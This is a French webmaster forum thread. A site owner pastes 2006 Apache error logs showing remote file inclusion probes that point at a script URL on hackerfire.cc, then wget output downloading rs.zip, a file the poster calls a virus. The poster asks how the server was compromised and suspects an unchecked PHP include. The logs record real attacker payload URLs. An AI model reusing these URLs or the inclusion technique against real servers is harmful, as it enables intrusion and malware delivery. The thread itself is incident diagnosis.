Discussion :

[arnoweb]

J'ai regardé dans les logs d'apache et constaté la chose suivante :

[Sat Jul 1 04:33:56 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/flash/menu06_http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:33:57 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:33:57 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:33:58 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/top/compteur/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:04 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:04 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:06 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/flash/menu06_http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:06 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/top/compteur/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:11 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:11 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/menu/http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:12 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/flash/menu06_http://www.hackerfire.cc/upload/download/bslab.txt
[Sat Jul 1 04:34:12 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/top/compteur/http://www.hackerfire.cc/upload/download/bslab.txt

[Sat Jul 1 04:34:13 2006] [error] [client 201.13.43.238] File does not exist: /home/www/img/flash/menu06_http://www.hackerfire.cc/upload/download/bslab.txt
--04:34:18-- http://rsystem.100free.com/rs.zip
=> `rs.zip'
Connecting to rsystem.100free.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 17,318 [application/zip]

0K .......... ...... 100% @ 165.80 KB/s

04:34:20 (165.80 KB/s) - `rs.zip' saved [17318/17318]

--04:34:20-- http://rsystem.100free.com/rs.zip
=> `rs.zip.1'
Connecting to rsystem.100free.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 17,318 [application/zip]

0K .......... ...... 100% @ 85.41 KB/s

04:34:20 (85.41 KB/s) - `rs.zip.1' saved [17318/17318]

Le fichier zip est effectivement un fichier virus. A t-il été envoyé sur mon serveur ? merci.

[peppena]

oui
le fichier a été uploadé sur ton serveur

[arnoweb]

Comment savoir ce qui c'est passé ? comment le "hacker" a t-il pu accéder à mon serveur ?
Il semble qu'il tente de charger un fichier texte en scannant mes répertoires ?
Est-ce qu'un simple include (avec existence du fichier non vérifié) en php pourrait être la cause de ce hackage ?

[arnoweb]

J'ai donc été déface et j'ai l'url de l'image ? cela me permettrait-il de retrouver le hacker ? sinon j'ai fait un traceroute sur le site où est hebergée l'image ?